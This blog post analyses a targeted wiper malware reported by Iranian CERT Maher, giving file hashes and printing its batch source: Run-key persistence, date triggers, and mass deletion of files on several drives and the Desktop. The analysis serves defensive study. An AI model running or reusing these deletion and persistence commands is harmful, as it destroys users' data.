Iranian CERT Maher just posted

Latest investigation have been done by Maher center in cyber space identified a new targeted data wiping malware. Primitive analysis revealed that this malware wipes files on different drives in various predefined times. Despite its simplicity in design, the malware is efficient and can wipe disk partitions and user profile directories without being recognized by anti-virus software. However, it is not considered to be widely distributed. This targeted attack is simple in design and it is not any similarity to the other sophisticated targeted attacks. The identified components of this threat are listed in the following table”…

As it happens quite some time, the malware itself seems not to be much of interest, but the possible targets and the way they probably used it makes it more into attention. So don’t judge too early about the lameness of such tool, it can still pinpoint an important action.

The main file, GrooveMonitor.exe is a self-extracting file, it contains a rar file at position 103936. The rar contains juboot, jucheck and sleep.

GrooveMonitor.exe [dropper] f3dd76477e16e26571f8c64a7fd4a9
juboot.exe fa0b300e671f73b3b0f7f415ccbe9d41
jucheck.exe c4cd216112cbc5b8c046934843c579f6
SLEEP.EXE ea7ed6b50a9f7b31caeea372a327bd37
WmiPrv.exe b7117b5d8281acd56648c9d08fadf630

Sleep.exe is basically a public tool available for batch programmers:

juboot is a UPX 3.03 compressed archive of a probably bat2exe converted file (not checked what exactly) (very low on budget to write batch malware?), that contains these:

@echo off & setlocal
sleep for 2
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v jucheck.exe /t REG_SZ /d "%systemroot%\system32\jucheck.exe" /f

start "" /D"%systemroot%\system32\" "jucheck.exe"


jucheck contains
@echo off & setlocal

sleep for 2
del "%systemroot%\system32\juboot.exe" /q /s /f
del "%userprofile%\Start Menu\Programs\Startup\GrooveMonitor.exe" /q /s /f

if "%date%"=="Mon 12/10/2012" goto yes
if "%date%"=="Tue 12/11/2012" goto yes
if "%date%"=="Wed 12/12/2012" goto yes

if "%date%"=="Mon 01/21/2013" goto yes
if "%date%"=="Tue 01/22/2013" goto yes
if "%date%"=="Wed 01/23/2013" goto yes

if "%date%"=="Mon 05/06/2013" goto yes
if "%date%"=="Tue 05/07/2013" goto yes
if "%date%"=="Wed 05/08/2013" goto yes

if "%date%"=="Mon 07/22/2013" goto yes
if "%date%"=="Tue 07/23/2013" goto yes
if "%date%"=="Wed 07/24/2013" goto yes

if "%date%"=="Mon 11/11/2013" goto yes
if "%date%"=="Tue 11/12/2013" goto yes
if "%date%"=="Wed 11/13/2013" goto yes

if "%date%"=="Mon 02/03/2014" goto yes
if "%date%"=="Tue 02/04/2014" goto yes
if "%date%"=="Wed 02/05/2014" goto yes

if "%date%"=="Mon 05/05/2014" goto yes
if "%date%"=="Tue 05/06/2014" goto yes
if "%date%"=="Wed 05/07/2014" goto yes

if "%date%"=="Mon 08/11/2014" goto yes
if "%date%"=="Tue 08/12/2014" goto yes
if "%date%"=="Wed 08/13/2014" goto yes

if "%date%"=="Mon 02/02/2015" goto yes
if "%date%"=="Tue 02/03/2015" goto yes
if "%date%"=="Wed 02/04/2015" goto yes
goto no


sleep for 3000
IF EXIST d:\ del "d:\*.*" /q /s /f
IF EXIST d:\ Chkdsk d:
IF EXIST e:\ del "e:\*.*" /q /s /f
IF EXIST e:\ Chkdsk e:
IF EXIST f:\ del "f:\*.*" /q /s /f
IF EXIST f:\ Chkdsk f:
IF EXIST g:\ del "g:\*.*" /q /s /f
IF EXIST g:\ Chkdsk g:
IF EXIST h:\ del "h:\*.*" /q /s /f
IF EXIST h:\ Chkdsk h:
IF EXIST i:\ del "i:\*.*" /q /s /f
IF EXIST i:\ Chkdsk i:

del "%userprofile%\Desktop\*.*" /q /s /f
\\start calc


Still the questions are
a.) What is the dropper
b.) Is it surely an important attack, no matter how amateur the tools are?


Leave a Reply